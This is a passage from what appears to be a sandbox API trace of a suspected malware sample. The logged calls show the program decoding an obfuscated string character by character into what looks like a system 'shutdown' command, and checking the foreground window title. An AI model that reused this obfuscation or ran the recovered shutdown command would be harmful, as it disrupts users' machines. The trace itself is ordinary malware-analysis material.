pvarResult=0x28f190) returned 0x0 [0181.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.599] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.599] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.602] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.603] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.603] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.604] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.604] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.605] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.605] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.606] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.606] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.607] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.607] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.608] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.608] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.608] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.609] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.609] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.610] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.610] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.611] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.611] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.612] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.612] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.613] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.613] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.613] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.614] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.614] GetForegroundWindow () returned 0x1011a [0181.614] GetLastError () returned 0x0 [0181.614] SysStringLen (param_1=" ") returned 0xff [0181.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.615] SysStringLen (param_1=" ") returned 0xff [0181.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.615] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0181.663] GetLastError () returned 0x0 [0181.666] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.666] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0181.666] SysStringLen (param_1="Fol") returned 0x3 [0181.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fol", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fol", lpUsedDefaultChar=0x0) returned 4 [0181.667] SetWindowTextA (hWnd=0x103c4, lpString="Fol") returned 1 [0181.667] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0181.667] GetFocus () returned 0x0 [0181.667] lstrlenA (lpString="Fol") returned 3 [0181.667] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0181.667] IsWindow (hWnd=0x103c4) returned 1 [0181.668] IsWindow (hWnd=0x103c4) returned 1 [0181.668] IsWindow (hWnd=0x103c4) returned 1 [0181.668] IsWindow (hWnd=0x103c4) returned 1 [0181.668] GetFocus () returned 0x0 [0181.669] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0181.669] GetFocus () returned 0x0 [0181.669] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0181.669] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0181.669] GetFocus () returned 0x0 [0181.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fol", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0181.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fol", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Fol") returned 4 [0181.669] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.670] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.671] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.671] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.672] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.672] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.673] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.673] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.673] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.674] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.674] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.675] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.675] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.675] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.676] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.676] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.677] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.677] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.678] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.678] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.679] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.679] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.680] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.680] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.681] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.681] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.682] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.682] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.683] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.683] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.684] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.684] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.685] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.685] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.685] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.686] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 